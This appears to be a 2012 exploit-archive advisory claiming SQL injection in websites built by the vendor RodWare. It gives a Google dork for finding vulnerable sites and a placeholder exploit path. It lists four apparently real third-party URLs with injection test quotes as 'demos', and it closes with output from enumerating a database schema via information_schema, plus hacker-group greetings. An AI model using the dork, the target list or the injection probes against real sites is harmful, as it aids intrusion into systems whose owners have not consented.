_    _ _____   ___  ____   ___  _____   _____   __
 | |  | |  __ \ / _ \|  _ \ / _ \|  __ \ / _ \ \ / /
 | |  | | |__) | | | | |_) | | | | |__) | | | \ V / 
 | |  | |  _  /| | | |  _ <| | | |  _  /| | | |> <  
 | |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \ 
  \____/|_|  \_\\___/|____/ \___/|_|  \_\\___/_/ \_\

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email:  ur0b0r0x_4n1@live.com
# Line:   GreyHat


# Exploit Title: RodWare - SQL Injection 
# Dork: intext:" Desarrollado por RodWare "
# Date: 06/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.rodware.net/
# Vendor Name: Rodware
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[02/11/2012] - Vulnerability discovered
[05/11/2012] - Vendor notified Dont responsed
[06/11/2012] - Public disclosure 
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/*.*=  < Sql Vulnerability Path >


# Demo_Xss_Sql_Vulnerabilities
http://www.vonbrugar.com/perro.php?idperro=1'
http://www.paordenar.com/index.php?querytype=1'
http://www.bellapod.com/featured.php?gid=1'
http://www.togomonster.com/index.php?querytype=1'

# Gr3t'x #########################
>> | Mr.Pack | Nick Nitrous  | Revolution_Hackers | Dylan Irzi | R00tc0d3r's |  SecurityDev | Mafia Dz | Algerian Hacker |
>> And All H4x0r5
Count(column_name) of information_schema.columns where table_schema=0x62645F6C697374656C6C6F and table_name=0x74626C5F7573756172696F is 5